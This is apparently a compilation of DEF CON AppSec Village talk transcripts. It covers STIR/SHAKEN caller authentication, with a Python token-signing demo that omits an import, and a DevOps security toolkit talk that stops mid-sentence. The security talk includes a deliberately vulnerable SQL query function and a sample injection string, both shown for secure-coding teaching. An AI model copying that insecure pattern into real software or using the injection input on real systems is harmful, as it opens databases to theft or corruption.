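import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec

# Originating provider's signing key (placeholder; really issued under a STIR CA)
key = ec.generate_private_key(ec.SECP256R1())
private_pem = key.private_bytes(
    serialization.Encoding.PEM,
    serialization.PrivateFormat.PKCS8,
    serialization.NoEncryption(),
)
public_pem = key.public_key().public_bytes(
    serialization.Encoding.PEM,
    serialization.PublicFormat.SubjectPublicKeyInfo,
)

headers = {
    "alg": "ES256",
    "ppt": "shaken",                                   # PASSporT extension in use
    "typ": "passport",
    "x5u": "https://cert.example-osp.com/shaken.crt",  # where verifiers fetch the cert
}
payload = {
    "attest": "A",                                     # full attestation
    "dest": {"tn": ["15558675309"]},                   # called number
    "orig": {"tn": "15551230000"},                     # calling number
    "origid": "8e3a4f2b-demo-origination-id",          # traces back to the OSP's customer
    "iat": int(time.time()),
}

identity_token = jwt.encode(payload, private_pem, algorithm="ES256", headers=headers)
print(identity_token)   # this is what rides in the SIP Identity header

# Terminating side: fetch the certificate named by x5u, then verify the signature
claims = jwt.decode(identity_token, public_pem, algorithms=["ES256"])
print("attestation:", claims["attest"], "origid:", claims["origid"])
```

The origid claim is the piece that lets a signed call be traced straight back to the originating provider's underlying customer.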
But it also includes some additional metadata like who the call is going to, who placed the call, and then importantly, the origin ID, the origination ID. This is for the originating service providers underlying customer. And so this is set by the originating service provider. And so the originating service provider, the OSP there, is really putting their reputation on the line saying, hey, this is my customer that is placing this call. And I'm giving them this level of attestation. And this is important because this ID makes it near instant to identify bad actors because you can trace back the call to the underlying customer. And this is what's going to allow us to enforce the truth and caller ID act. And so not only does shaken allow you to build trust in calls that aren't spoof, but it also allows a lot of the enforcement side of things to make sure that we can track down bad actors more quickly and more efficiently. So back to the attestation levels, there are three levels that can be attributed to a caller. And so the originating service provider is going to decide what the attestation level is here. So A is the highest level of attestation, of course. And so this is saying, I know who this customer is, and I know they can use this number that they are calling from. And so that is what you would assume most of the legitimate business calls being placed are attestation levels B and C have some less level of trust in the call. But this is still likely to be a less fraudulent call if it's signed with any of these attestation levels than if it wasn't signed at all. And so generally, I think what, and this is where we don't have a lot of standardization around this yet, but the clients, so the Googles, the apples, are going to have to decide in conjunction with the carriers, the Verizon's, the T-Mobile's, these types of people how to display trust. And likely what's going to happen is that they're only going to display a check mark or a verified caller if there is that attestation level A. So new technology is really great, but we need to make sure that people are actually implementing this. And so one of the things that is good about this is it puts the onus on businesses to do the implementation and not as much on the consumers to increase consumer protections. But the main way that we're going to ensure that businesses implement this is with the Traced Act. And so this is the Telephone Robocall Abuse Criminal Enforcement Deterrence Act. It was passed by the Senate last May, passed by the House and signed into law in December of 2019. So I think it was like December 30th of 2019. It was signed into law. And what it did is gave a timeline that started at that point. So basically you can think of the beginning of this year, it gives telecom companies 18 months to implement shaken and stir. And so you can think mid-2021 is kind of when the deadline for this is. A lot of bigger companies have been working on this for a while, but it's still going to start to enforce the deadline in mid-2021, assuming that everything goes as planned. So it also allows for a $10,000 fine for offenders. And so this does also add an additional fine on top of the existing Truth and Caller ID Act. So the authentication requirements for the Traced Act depend on the type of call. So if it's VoIP, the requirements there is that you have to implement shaken and stir. But they do acknowledge that there isn't really good solution for non-voIP calls yet. And there are a lot of non-voIP calls that are on the PSTN. 
And so Neustar has a solution called STIR Out-of-Band for non-VoIP authentication. If you are a company that's placing non-VoIP calls, there are things that you can look into here for you or your customers. But definitely I think that's one of the challenges to getting this implemented: not everything is just going to be able to implement shaken and stir. And that's kind of what I wanted to get into now, just what are the limitations of this technology. First being, according to my curmudgeonly co-worker Randy, who's been working in telecom for many, many years, the phone network is kind of an ungodly beast. And so it's a collection of wires that has been rapidly expanding for over 100 years. So there is this kind of situation that we've run into where there isn't a standard technology that's being used for all the calls. And so we can't just flip a switch and change everything over to be suddenly authenticated. And part of that ungodly beast is this thing called Time Division Multiplexing or TDM. This is essentially the opposite of VoIP. It's old school hardware that's been around for 50 years. It's baked into a lot of enterprise private networks. And the TRACED Act explicitly acknowledges TDM as a potential burden to implementing shaken and stir. So they cite the burdens or barriers to the implementation, including for providers of voice service to the extent the networks of such providers use Time Division Multiplexing — fancy language in the bill that basically says, we get it, this might be hard for people that aren't using VoIP. And then another challenge that we have is that there just is this long tail of service providers. This is something that companies like Twilio and Verizon, Comcast, other large companies have been working on for months. What happens when you're a smaller scale service provider that's running limited infrastructure? You might have different access points to the PSTN that aren't going to be VoIP, like I said. So, you know, of the 4,000 service providers in the U.S. alone, I don't know what percentage of those is going to be compliant by mid-2021. So the requirements to comply with this law do require significant investment. I don't know if we can reasonably expect that everybody will be able to make that investment in time. And then there's all these other problems. You know, the biggest problem is in the U.S. right now, but this is also a problem in places like the U.K. and Norway. And I haven't really heard of any initiatives outside of North America to address this. There are starting to be, you know, some initiatives to implement this in Canada. But, you know, if your country has a solution for this, definitely reach out. I'd love to hear about what you're doing for enforcement there. But you know, there's other things that we have to think about. Like what about ported numbers, you know, the international side, like I mentioned, and also text messages. There's other communication channels that don't have the same type of authentication. So the FCC's number one complaint right now is robocalls, but the government is obviously a little distracted with other global pandemics right now. But you know, I think in terms of that department, this is something that they have a priority and a motivation to fix. And so like I said, the timeline for enforcement here is that towards the end of 2020 or into 2021, we'll start to see more people start to implement this.
And you might start to see calls coming through already on your phone that might have a check mark or might have an indication that they're being signed. So what can you do in terms of implementing shaken and stir for your business? Talk to your service provider, whoever is doing your telephony. Most businesses probably won't have to do much in terms of implementation. A lot of the onus is going to be on the service providers themselves. You might have to go through some additional verification, some KYC, know-your-customer type stuff with your service provider. So at Twilio, we'll need you to create a business profile that has some additional details about your account before we would start signing your calls with the highest attestation. And then there's some precautions that you can take as just application security professionals. So you can protect your numbers from web scraping bots. Don't assign sequential numbers to your employees; that's a way that people can kind of guess which employees might have lines at your company. And then you can use actual authentication in your call centers. This is another way that you can protect your business from vishing. This is something that I could talk about for many, many hours — a lot of companies basically will only ask for a consumer's date of birth and email in order to verify the customer. So there's a lot of other things you can do to actually authenticate people on either end of the call. And then if you know what a PBX is and you have one, you might look into installing the FCC blacklist database on that. Some controversy around whether or not you want to do that. It's hard to get off the blacklist database if you're on there. But this is something that you may or may not have to worry about. And then there is some ongoing legislation. But things have been pretty quiet from the FCC this year. They did recently, somewhat recently, like in the last year, give telcos the authority to block unwanted calls without explicit subscriber permission. And so AT&T, Verizon, T-Mobile in the US, they can now decide, hey, we're going to send this to basically like a spam folder without ever notifying you that the call came in. And they don't need you, Kelly, to tell them that that's okay. And then like I mentioned, in terms of the timeline for the TRACED Act, the enforcement will start to begin at the end of 2020. This update from the FCC on this was March 31. And this reaffirmed their call to implement SHAKEN and STIR. But it did already grant an exception for an extension for small voice service providers. And I don't know what that means. I don't know exactly how they're going to decide who is a small voice service provider. But they are already thinking about — you know, this was three months after the bill was signed into law — they're already saying, hey, maybe this timeline isn't reasonable. So while I do think that a lot of larger telecom providers will start to sign calls within the end of this year, I do think that there is going to be an exception for that long tail of service providers. And not everything is going to be a signed call before, you know, the end of 2021. There are a couple of things you can do as a consumer to protect yourself today. You can install one of these apps depending on how much you trust them. A lot of times you have to give them basically complete control over your phone. So your mileage may vary there.
But there are things like the Nomorobo or RoboKiller apps, and companies like AT&T have a partnership with a company called Hiya that does, you know, some protection against spam calls. Of course, a lot of consumer telecoms are starting to upsell spam detection services. So Verizon offers their Call Filter Plus for the low, low price of $3 a month. But you know, these are things that you can look into installing on your phone if this is something that is a huge nuisance to you right now. So like I said, unfortunately, I don't think this is going to solve all problems right away. But I think people are really optimistic that SHAKEN and STIR will help restore trust in telephony, because not only is it going to help, you know, mitigate spam calls that are coming into your phone, but for those wanted calls, you know, the calls that you want to see that might be from unknown numbers, there's going to be a renewed trust in some of those phone calls. And so there is that motivation from businesses to restore that type of trust so that people will answer the calls. Hopefully this is a good overview in terms of what you can expect from SHAKEN and STIR. If you have any questions, you can find me on Twitter. I'm also on Discord. Once again, my name is Kelly Robinson, and thank you for listening.
|
If you've noticed a surge in unwanted robocalls from your own area code in the last few years, you're not alone. The way telephony systems are set up today, anyone can spoof a call or a text from any number. With an estimated 85 billion spam calls globally, it's time to address the problem. This talk will discuss the latest advancements with STIR (Secure Telephone Identity Revisited) and SHAKEN (Signature-based Handling of Asserted information using toKENs), new tech standards that use well accepted public key cryptography methods to validate caller identification. We'll discuss the path and challenges to getting this implemented industry wide, where this tech will fall short, and what we can do to limit exposure to call spam and fraud in the meantime.
|
10.5446/51609 (DOI)
|
Hello and welcome back. Hope you're looking forward to another fantastic talk here at the AppSec Village for DEF CON 29 in safe mode. It's important to remember your 3-2-1 (three hours of sleep, two meals, one shower a day). Even though we are separate from each other and socially distanced, your cohabitants will really appreciate that one shower in there. Just take care of yourselves, get some good sleep, get some good food, make sure you take a shower. For our next talk, we've got David Waldrop talking about the DevOps and Agile Security Toolkit. After 25 years in application development, David moved to Information Security just over 7 years ago. His passion is helping developers write secure code. He's currently an Information Security Advisor supporting the application development community at his employer. Let's put our hands together and welcome David Waldrop. Hi and welcome to the AppSec Village. I hope you're having a great DEF CON 2020, albeit in safe mode. My name is Dave, and for the next 30-45 minutes we're going to talk about the DevOps and Agile Security Toolkit. Now before I get started, I have to make the standard disclaimers. First, this presentation and any comments that I make are my own and do not necessarily represent those of my employer. Secondly, I will mention a few example products; some are commercial, some are open source. These are not necessarily meant as recommendations. They are mentioned to serve as a starting point for your own investigation and review. These are things that I've run across in my journey, so take that as it is. Let's start with the two terms that are on everybody's buzzword bingo sheet these days: DevOps and Agile. We need to get definitions in place for the duration of this talk, so we have an idea that we're all dealing with the same playing field. Agile focuses on continuous iterative development and testing. Software is developed in smaller increments and then is integrated for final testing and delivery. Scrum, Kanban, and XP (Extreme Programming) are examples of Agile approaches. On the other hand, DevOps focuses on the collaboration between AppDev and Operations. The focus is on deploying code to production in a fast manner, usually automated. So you can see from the definitions that these are two separate concepts. However, many organizations tend to combine them into one initiative. Very, very rarely do you find a shop doing DevOps and not doing Agile, or vice versa. So no matter whether they start with DevOps or they start with Agile, the one piece that's usually late to the party is security. But no matter how late security is invited to the party, or whether we have to crash the party ourselves, we usually can still bring valuable resources without slowing things down, or at least without slowing them down a lot. And that's what we're going to talk about through the rest of this discussion. So for the past few years, I've worked with several different Agile and DevOps teams. My integration with this started as a pilot program where I was the information security representative assigned to help introduce Agile to our organization. More recently, I've implemented the information security integration with the Agile and DevOps teams across our organization. During this session, I'm going to share with you some things that really worked well and some things that just didn't seem to work at all. So hopefully you can take something away from this and apply it to your own organization.
This particular slide will give you the map of what we're going to talk about for the rest of this discussion. We're going to talk about Agile staffing. We're going to talk about the eight simple questions. We're going to talk about the security champions program and then go into developer training, which is my favorite part of my job. Security in the software development lifecycle. And then we're going to hit the hat trick of securing your code, static code analysis, dynamic code analysis and open source analysis. And then finally, we're going to wrap things up by automating the heck out of it. So let's start with Agile staffing. Sherman set the way back machine for one when I started with Agile. One information security person was assigned to one Agile team. That security person would be integrated into that team and attend every ceremony, every meeting, everything, every day. That didn't work. There are a couple of reasons I think that that didn't work. First of all, agile teams tend to multiply. You can go from a proof of concept with one team to having close to 30 teams in less than two years. Most organizations do not have the information security bandwidth to support that type of staffing model. In addition, the scrum masters tend to treat every member on the team as though they can perform all tasks. And when you're dealing with a team of all developers, that makes perfect sense. This model tends to fall apart though when you put information security, QA, middleware, any other infrastructure or shared services team as a part of the agile team. What happens is in the agile process, their hours count against your available development hours. But the infrastructure people, the information security people do not have the skills or the capabilities to do some of the development. You see that there's a mismatch. You're given hours, but you're not allowed to use them. It caused a lot of problems for some of our scrum masters early on. Again, we realized this was not the way to do it. I ended up coming up with a two tiered approach for trying to integrate information security into the agile team. First, at a high level, at the enterprise level, we will have an architect, an information security architect, and they will inject into those high level projects and basically set up guardrails and guidelines. So as projects are being devised at the visionary level, they can jump in and try to help guide them into making more secure decisions at that high level. Now, when you get down into the weeds though, each agile team does need to have somebody they can rely upon for information security. And so what we ended up doing is we created named resources within the information security team that are assigned to agile teams. Now it's not like the previous model. You're not assigned, you're not sitting with them, you're not assigned to go to every meeting. We're going to talk about how we scaled that back, but we ended up finding a way where based on where information security can add the most value, we attend those ceremonies and only those ceremonies. So at the end of the day, each information security representative can support between six and eight different agile teams. That is a model that is certainly sustainable. So what is a little different? Well, first of all, we make sure that every agile team has a named resource that is responsible for information security for them. 
So this gives them a named contact if they ever need something they know exactly who to call and where to start that quest. Secondly, we attend or the agile reps attend the backlog refinement sessions. These are meetings that happen once every two weeks before the next sprint and it defines what they're going to work on in that next sprint. It's a perfect opportunity to jump in and say, hey, you're planning this work. We need to think about blah, blah, blah from an information security standpoint. We can get in just ahead of when development starts. It's a perfect time to bring up security issues, make recommendations and answer questions. And then finally, we attend the quarterly planning agreement meetings where the vision is cast for the next quarter and we can make sure that we're on their radar for things that we think we need to be a part of. So this is kind of a high level diagram. The purple arrow at the top is the information security architect. That particular person, as you can see from the diagram, sets guardrails for enterprise planning projects. All of the red arrows are the different places where our individual security representatives can or may inject into the agile teams. We don't inject in all those places, but there are places where we can and we give them that option to call us if they're needed. So let's move on to what I like to call the eight simple questions. This particular concept came up as a result of assigning our agile reps to their teams. We found that the leadership within the agile teams really wasn't sure when to call us. And since we weren't sitting there in every meeting, there was a possibility that something could come up that might fall off the radar that we might not get contacted for that they may not even think is important. So we decided that we need to give clear guidelines to the scrum masters and product owners as to when they should include information security. That's how I created the eight simple questions. So basically these eight questions are a guideline for that leadership team. And if they answer yes to any of them, they need to make sure to include their information security representative in those discussions. These are the questions as I currently have them. We're going to talk about that in just a bit because they change over time. These are not one and done kind of things. Am I dealing with any sensitive information? Now information that is sensitive, it's going to mean something different for each one of our organizations. If you're working in healthcare, if you're working with banking information, if you're working with retail with PCI information, you will be able to find what sensitive information means for your organization. Am I sending or receiving data outside of the company? Is there a new vendor involved? Am I going to introduce new software systems or libraries, even open source and remember open source because we're going to talk about that? It's a unique challenge. Do I need access to secrets such as passwords, keys or certificates? Will I need the ability to use single sign on? Am I going to leverage the cloud? Will I need updated access roles? So these eight questions are what we are currently using as a guideline for the interaction between the agile team and their information security representative. As I mentioned, the exact questions are going to differ on your organization. The questions themselves will actually change over time. 
I started, I think, with seven questions, and then we had several issues come up with access roles and who to ask and blah, blah, blah. So we added a question for that too. So don't be afraid to take a stab at it and massage it and change it. That's the thing about Agile and DevOps: it's changing all the time, and we as information security people need to be able to change our stuff as well. So the basic idea is this. Create a list of questions, usually 10 or less, something that's going to fit easily on a PowerPoint slide or a single piece of paper so they can take it to meetings with them. Give that to the agile team leadership and they have a guideline. They now have a concrete way of knowing when they need to work with information security. We found another advantage to this approach as we onboarded additional information security people to become representatives for the agile teams. A lot of these folks were pretty new to the organization and they didn't really know when they needed to inject themselves into their teams. They didn't know what they needed to listen for in the backlog refinement sessions. So we used these simple questions on our own people. It gave them guidelines and hints of what to listen for when they're working with their agile teams. So this kind of became a win-win on both sides of the coin, and I think this was a great tool that we've been able to use. Another tool is one that I honestly have to thank Jim Manico for. Jim, if you're out there, thank you for this. This was a recommendation he made to me after one of our training sessions, and that is the security champions program. A security champions program is a team of application developers. We get one from each agile team, and these developers have expressed an interest in information security or secure coding or just security in general. This is a voluntary program; the members of the team volunteer to come to the security champions program. And we typically meet quarterly. I provide them lunch when we're in the office, thanks 2020. I look forward to getting back to the office and having lunch with these guys and gals. They're a great team. So the team has the following charter. We assist the agile teams in terms of application security. We serve as a communication conduit between the agile teams and information security. And then we meet quarterly to share experiences, ask questions, and share knowledge. It has had some incredible benefits. First of all, security has a relationship with at least one person on every agile team. I'm not saying we have a mole. What I am saying is sometimes we hear about things long before it percolates through the management chain. I might get a phone call about, hey, we're thinking about using this open source library, is that cool? We take a quick look at it. We approve it. By the time the formal approval request gets into my hands, we've already handled it and it's already in their code. So it gives us a great communication conduit, and that helps us move things faster. I may have not mentioned this before; hopefully I have: relationship is key. You're going to hear about relationships throughout this entire discussion. We build relationships with those agile teams. It starts with having an assigned rep. It moves to a different relationship level when we have a security champions team. Secure coding training takes it to yet another level. And you'll see why in just a few minutes as we talk about the developer training. But it's about building relationships.
It's about having fun while we're doing the right thing for our organizations. So so far the team has done a lot of really cool things. We've reviewed vendors and products both on the development side and on the information security side. We've selected our developer training programs for the last two years based on the input from the security champions team members. We've done a bunch of PSEs together. We've cross consulted. Now this was kind of an unexpected benefit is where if I had a team that was very well versed in one technology and they mentioned that in a security champions lunch, another team might reach out going, hey, we're about to do that. Can we stand and talk? So it actually starts to cross pollinate some security knowledge and some technical knowledge between different application teams. And then finally, it's served as a candidate group for application security openings within the infosec team. The software development life cycle. So as we started to roll out security, a lot of people have asked us, how does this fit into our SDLC? So I ended up creating a plan that maps information security phases to the software development life cycle as it currently exists. It is not a perfect fit, but I think it is a good representation of how information security can bring value to each step of the SDLC. So this is what I like to call my dark side of the moon diagram. Those of you old enough to remember probably recognize the album cover. So if you take a look on the right, we have the software development life cycle from concept into design up into coding testing a QA, QA and deployment and then post deployment at the very top. Now, if you look on the left side, you'll see that it matches up pretty closely with security knowledge, security design, secure coding techniques, security testing and then security response. The each individual layer of the pyramid, I think are deliverables that security can bring that help take that concept on the left and apply it to the SDLC phase on the right. And we're going to walk through those real quick. Training is the base of the pyramid. I think training is foundational to everything above it. If you don't have a solid foundation of training for your application developers, everything else is at risk. So this particular approach, we're going to talk about in depth again, because it's my favorite part of what I do. It includes things like lunch and learns, outside speakers, conferences like you're attending right now, video training and things like that. The next level up is threat modeling threat modeling, the application team and InfoSec. We sit together, we work together to examine the application design, the system flows, whatever they can bring to us that they have available in that design phase. We look, we try to work together and identify potential vulnerable vectors and try to figure out a way that we can mitigate them. Now threat modeling, there are books upon books written about threat modeling. And there are people in my organization on my InfoSec team that are much better at it than I am. And they can actually create incredible documents and spend hours and days and days and days doing this. I think you need to start out small. I think it's about baby steps at first. Start with a discussion. This can be a one or two hour discussion where you have those deliverables from the design phase and you whiteboard them. And you come out of there with to dos or questions or things to research. 
It doesn't have to be this big, heavyweight, overbearing approach to threat modeling at first. It needs to be a conversation, which gets back to relationships. You need to have those relationships in place so you can have those conversations. The third level up is static code analysis. We're going to talk about this in much more detail later. But most tools are designed to identify potential vulnerabilities within the code. Static code analysis actually looks at the code and looks for patterns within the code without running it. We're going to see a little bit later why that's important. I think I went the wrong way. There we go. Dynamic code analysis is the next layer up. And that is very similar to the previous layer, which was static code analysis. But instead of just looking at the code, the code is actually executed and tested for vulnerabilities. So like I said, these two pieces are very, very similar. One is looking at patterns within the code. The other is actually exercising the code and looking for issues. The next is pen testing. Pen testing can be performed by your internal team if you have the skills or resources, or you can use an external firm. This is usually a greater scope than dynamic testing. It will actually look at things not just in your application but system wide for vulnerabilities and attack vectors. And usually there's a person involved. It's not just an automated exercise. We're going to see a little bit more when we talk about dynamic testing, the difference between that and pen testing. And then finally, when the code is in deployment, you need to have a vulnerability management process where you can classify, assign, and track identified issues. Right now, InfoSec meets regularly with a representative from each application team to review these and to make sure that they're working and they're on track. Again, those relationships are absolutely key to making this work. So now we are getting to what I consider my absolute favorite part of my job, and that is developer training. If you remember back to that pyramid we just looked at, this is the foundation for everything that information security does with app dev. When I came in to information security about seven years ago, I started a developer training program because I realized that the developers really are your last best hope for defense when it comes to application security. If your application is written correctly, then everything you throw in front of it, application firewalls, everything like that, that's gravy. That's nice, but you've got a really tight application, and that's where real security takes place. The problem is, I was a developer for roughly 25 years before coming to information security, and nobody taught this stuff. This is stuff you learned on your own if you had an interest in it, and it wasn't universally available to all developers. So I started small. I started with Lunch and Learns. It was really something that, hey, I think this is important. Let's try it. Let's see if it works. And it really did. We would end up having Lunch and Learns about every other month. I would create a class on a specific topic. My first one was cross-site scripting, a lot of fun. It's neat when you can show people cross-site scripting examples, even if you just run WebGoat or something like that. They get excited. They kind of dig it and they start trying it on their own stuff. The content usually lasts about 40 or 45 minutes, a lot like this session.
And then we leave 10 to 15 minutes for open discussion and questions. Now the key here is make it fun. It has to be fun. I do things like I'll go out and I'll buy cookies or some kind of treat, so we can all sit around and eat something together. There's usually some kind of door prize or door prizes. And they don't have to be expensive. You can just go down to Five Below and get a couple of wireless Bluetooth speakers. And people dig it. It's a lot of fun. Again, making it fun is absolutely key to a successful Lunch and Learn program. So once we got that up and running, I decided we needed to take this up a notch. There is a level of training that I couldn't provide that I think our developers really, really would benefit from. And in order to do that, I knew that I had to reach out to industry experts. And what we ended up doing is we were able to get commitment from management, both on the IT development side and on the InfoSec side, that we could do one or two days where most, if not all, of the developers will attend a training event. Now here's a hint. If you are going to try this and you're doing Agile, put it in your innovation sprint. If you put it in the innovation sprint, which is usually the last sprint of the quarter, when the developers have a little more leeway in what they work on, you'll very likely get more participation than if you step into the middle of a sprint where there are actual deliverables due. So keep that in mind. I was really, really lucky. My very first interaction with this program, I was able to secure Jim Manico, and he came in and made an incredible impression on our development teams. Jim's been back, I think three times now. Always a pleasure. Rich Mogull's been by twice. We've had a recent one with Ron Parris. Dr. Philippe De Ryck, phenomenal instructor. I just took his OAuth class. So if you're looking for OAuth, wonderful class. But we've got him coming in this fall and I'm looking forward to that. The reason I actually want to call these gentlemen out by name is I think it's important to be grateful. I am very grateful for everything they've done for me and my development teams. And it's important to be grateful to those who help you along the way on this journey, because none of us make it alone. So gentlemen, thank you very much. If you see this or hear it later, your training, your mentorship has meant a lot to me and my development teams. So one cool aside, I mentioned this earlier: the security champions team has been involved in the selection of the instructor for the last two years. This gives your application development teams a voice in the training. And we've seen that participation has actually increased. We had great participation before then. But when the developers actually had a voice in picking who's coming in and what they're going to talk about, we're finding that it's much more applicable to what's on their roadmap. It's much more applicable to the skills they're hoping to get. And participation goes beyond what I could have ever hoped for. So again, we're starting to see some of these initiatives starting to weave together and build kind of a program. It's kind of cool. So this next one, I really wish I was doing this right now. Take a developer to DEF CON. We had management agree to provide scholarships to developers that were selected by the information security team. So we would give them the money to buy their badges, so they wouldn't have to go and get money out of their own bank account.
So each year, I've been able to bring up to three developers to DEF CON. That's been awesome. It has been just a phenomenal experience. They've gained a ton of knowledge and a ton of awareness by DEF CON. One of the things that I found really interesting was I really advise them not to restrict their sessions to things that they think will apply to their job. I did that my very first DEF CON and I wasn't really sure I was going to come back to be honest with you. The next year, one of my coworkers strongly encouraged me to go. Thank you, Barry. And encouraged me to go and find a few fun things that just had nothing to do with my immediate job. The interesting thing is they ended up having more to do with the things that were coming down the road in my job than I ever could have imagined. So I fully encourage each one of these developers that I bring to DEF CON to experience the full DEF CON experience. Go to all the sessions. Try some of the capture the flags. Try whatever you want. Have a good time because it's really important for them to be immersed in the DEF CON experience. So like I said before, they come back with a changed perspective. It's a lot like that scene in The Matrix where that thing crawls out of Neo and he goes, my God, that thing is real? They understand now that the security is not just something that we're teaching and preaching about within InfoSec. That this stuff has real world application. And it's that realization that makes them a better developer, a more secure developer going forward. We've seen a trend where a lot of the folks that we've taken actually, I think all but one of the developers that we've taken to DEF CON have eventually become security champions members. And then more recently, just in the last couple of months, one of those developers, I think he was the first one I took to DEF CON with us, ended up joining the information security team on a full time manner. And Shane, if you're listening, welcome. I'm really glad that you're part of the team. So there's a couple of other fun activities that we do in developer training. Again, got to keep it fun. Everything has to be fun. You learn better when you're having a good time. I mean, look at DEF CON, we're all having a great time. And we're learning stuff. So a couple of DEF CONs ago for reasons of work, I couldn't make it. It was the only DEF CON since coming over to information security that I was not able to go to. And I must admit, I was bummed. So what I decided to do was I was going to have my own little DEF CON. And we decided that, okay, let's just take people along for the ride. So we identified five videos from previous DEF CONs and we had a lunch and learn for five days that week where we watched it and we talked about it. We had drawings for DEF CON related swag or items or giveaways. We just kind of had a good time. It was kind of built up as, hey, take a break, come bring your lunch, let's hang out, watch something from DEF CON, talk about it. You might win a t-shirt, you might win some stickers, whatever. And people really enjoyed it. It was a lot of fun. As a matter of fact, I'm probably going to do one this fall for the folks that didn't get to enjoy what you're doing right now, what you're enjoying right now. And then finally, I have an annual thank you lunch and learn. This was a tradition I started the first year we did lunch and learns. It's always the last lunch and learn of the year. And I typically will go out and I'll purchase quite a few giveaways. 
They don't have to be expensive. We do things like, say, the Bluetooth speakers, boxes of candy. We've done some Christmas mug sets, you know, just weird things, but things that are kind of fun. And we do a shorter lunch and learn followed by a session where we just eat some good food and we have some drawings. And I have an opportunity to thank my development community for the support of the lunch and learn program and for the support they've given to information security. I think it's important to say thank you. And this has been just an incredibly popular lunch and learn every year. It's a lot of fun and I highly recommend it. So here are the keys to a successful lunch and learn, or any successful training program. Make it applicable and give the developers a voice in the training. And usually if you give them a voice in the training, it will be applicable, just because they're going to tell you what they need. I think I've mentioned this 1427 times, but make it fun. It's got to be fun. Share how much you care about this stuff. If you're engaged, if you're passionate about it, people are going to feel that and they're going to gravitate to you and gravitate to that topic. And then finally, build relationships. Listen, reward, and always express gratitude along the way in this journey. So we're getting into the next phase of the toolkit. And this is what I like to call the analysis hat trick. Three types of analysis that, if we implement all three, give us a much more secure code base in production. And the first is static code analysis. You might remember that from our SDLC pyramid. So static code analysis scans the code without running it. It looks for known patterns of vulnerabilities. You can usually select what you scan for. Some will allow you to scan for PCI, blah, blah, blah. I almost always scan for the OWASP Top 10. If you're not familiar with OWASP or the OWASP Top 10, I strongly recommend that you check it out. Some of the deliverables from that organization are absolutely stellar. I've been a member for, I think, seven years now, since just after joining the InfoSec team, and I've leveraged a ton of their stuff. So great organization, hats off to you if you're out there. In an ideal world, the static code analysis tools would only report the confirmed vulnerabilities. But even if you tune the daylights out of this thing, you're still going to get false positives. And that becomes a problem. Because originally, when we first set up this process, I was the only one that could review the false positives and whitelist them, or waive them, as it were. That slowed things down immensely, because that was not my full-time job. That was something else on top of my full-time job, and possibly another full-time job some days it felt like. So that being said, I decided to leverage the security champions. These were folks that had some basic knowledge of security. They knew their applications better than I ever would. And they had a passion for making secure code. Seemed like a perfect fit. So what I ended up doing is giving several members of the security champions team the ability to review and waive false positives. And that has worked out great. The end result was we've had a lot more throughput. We've been able to address false positives much more quickly. And the adoption of the static code analysis tools has actually increased as a result of not having that delay. So I also see static code analysis as an extension of developer training. A lot of these tools have an IDE component.
So for example, I used the Spring Tool Suite for Eclipse. And you can use the plug-in and execute your scan from within your developer tool. And it will take you straight to the line that's got the problem. And in some of these tools you can even have recommendations pop up in the bottom of one of the windows that says, hey, you might try blank, blank, and blank to address this vulnerability. If developers are doing this while they're developing, not waiting for the build process, it becomes a teaching tool. Because as a developer uses this, he or she is going to identify and learn that, oh, I need to check my input fields to make sure they're the right type and right size. Okay, you do that enough times, it becomes second nature. So this becomes not only a way to secure your code, but a teaching opportunity as well. Studies have shown that static code analysis can identify up to 80% of vulnerabilities. That's pretty awesome. If I could tell you that you can do one thing and remove 80% of vulnerabilities, I think that'd be worth doing. So this might be something you might want to take a look at. Here are some example products. Here are three products along the top that are commercial. OWASP has an entire list of code analysis tools at that link right there. Again, not meant as recommendations, but these were tools that I've come across in my journeys. And they might at least act as a starting point for your own investigation. So the second goal in our hat trick, the second piece of the tripod, is dynamic code analysis. This was also in the SDLC pyramid. So unlike static code analysis, dynamic code analysis actually executes the code. That has a prerequisite that the code has to be compiled, free of errors, and able to run before you can actually perform the dynamic code analysis. Dynamic code analysis, I mentioned this before, is different than pen testing: dynamic code analysis looks for the flaws in the code that can be exploited, while pen testing looks for ways to exploit the system in general, often in greater detail and almost always involving a human attacker. So again, two different things. They're kind of similar, but I really think that dynamic code analysis is at best a subset of a good penetration test. So dynamic code analysis tools can identify up to 85%. But if you combine them with the static code analysis tools on the market, up to 95% of your application's vulnerabilities can be identified early on. 95%. That's pretty darn impressive. So again, I'm going to throw a few products up here for you to take a look at. I've used several of these. Again, not recommendations, but a place for you to start. Let me give you a word of warning. I think I told you earlier on, I would tell you some things that work and some things that just didn't seem to work quite so well. Some of these tools can be weapons. I'm looking at you, Burp Suite. You need to do things like make sure you set the scope of your testing tool so it doesn't see the, oh, I've got a link to Facebook here, I will jump and follow that link in my crawl and I will start attacking Facebook. Set your scope absolutely to your application only. Run this stuff in test. Don't run it in production. If you find a SQL injection exploit and you start to execute it, it's very, very likely that you're going to corrupt or lose data in the database on the backside of that injection vulnerability.
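To make that pattern-matching idea concrete, here is the classic finding these scanners keep coming back to. The snippet is made up for illustration, it is not from any real product or codebase: the concatenated query is what a static analyzer flags on the exact line, and the parameterized version is the fix it usually suggests.

# The classic pattern a static analyzer flags: user input concatenated straight
# into a SQL statement. Hypothetical snippet, invented for illustration.
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str):
    # Flagged: input like  dave' OR '1'='1  turns this into "return every row".
    query = "SELECT id, email FROM users WHERE name = '" + username + "'"
    return conn.execute(query).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # The usual suggested fix: a parameterized query, so input stays data.
    return conn.execute(
        "SELECT id, email FROM users WHERE name = ?", (username,)
    ).fetchall()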
Also, watch out for forms. So let's say you're doing some dynamic testing and it's automated and you're getting ready to essentially attack a web form. Make sure you find out where that web form is going before you start your test. You can easily overrun a service desk by submitting thousands upon thousands of emails from a web mail form. Not saying that I've ever done that, but I know that it has happened. So the third goal in our hat trick is open source analysis. Open source is awesome. We all use open source. Some estimates put the percentage of open source in internally developed applications at 70%. That's 70%. Now, the problem with that is that, as a result, about 50% of our applications contain one or more open source pieces that have a high security vulnerability. Keeping that out of production is a huge, huge task. There are two different approaches I've taken when I've tried to address this problem. The first was a firewall slash proxy solution. There are products out there that you can set up to proxy the main repos out in the wild. As you pull down code libraries, they'll check them for license compliance. You can say, hey, I'm okay with this license and this license, but I don't want that license. You can set that up ahead of time and it will check, each time a module is pulled down, that it is in compliance with your licensing. But more importantly, you can also set a vulnerability threshold. You could, for example, say, hey, I don't want any critical or high vulnerabilities; I don't want anything with a CVSS of 7 or higher coming into my organization's local repository. The problem with that is a lot of the tools that developers use, 